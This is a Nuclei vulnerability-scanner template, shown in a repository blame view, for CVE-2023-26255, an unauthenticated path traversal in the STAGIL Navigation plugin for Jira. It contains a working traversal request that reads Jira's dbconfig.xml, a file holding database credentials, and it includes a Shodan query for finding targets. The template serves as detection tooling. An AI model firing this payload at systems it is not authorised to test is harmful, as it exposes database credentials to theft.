nuclei-templates/cves/2023/CVE-2023-26255.yaml

42 lines
1.3 KiB
YAML
Raw Normal View History

2023-03-16 12:25:17 +00:00
id: CVE-2023-26255
info:
name: STAGIL Navigation for Jira - Menu & Themes - Local File Inclusion
author: DhiyaneshDK
severity: high
description: |
An unauthenticated path traversal vulnerability affects the "STAGIL Navigation for Jira - Menu & Themes" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjCustomDesignConfig endpoint, it is possible to traverse and read the file system.
reference:
- https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26255.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-26255
- https://marketplace.atlassian.com/apps/1216090/stagil-navigation-for-jira-menus-themes?tab=overview&hosting=cloud
2023-03-16 12:25:17 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2023-03-16 12:25:17 +00:00
cve-id: CVE-2023-26255
cwe-id: CWE-22
2023-03-16 12:25:17 +00:00
metadata:
shodan-query: title:Jira
2023-03-16 12:25:17 +00:00
tags: cve,cve2023,lfi,jira,cms,atlassian
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime"
matchers-condition: and
matchers:
2023-03-16 12:31:10 +00:00
- type: word
part: body
words:
2023-03-16 12:25:17 +00:00
- "<jira-database-config>"
- type: word
part: header
words:
- '$textMime'
- type: status
status:
- 200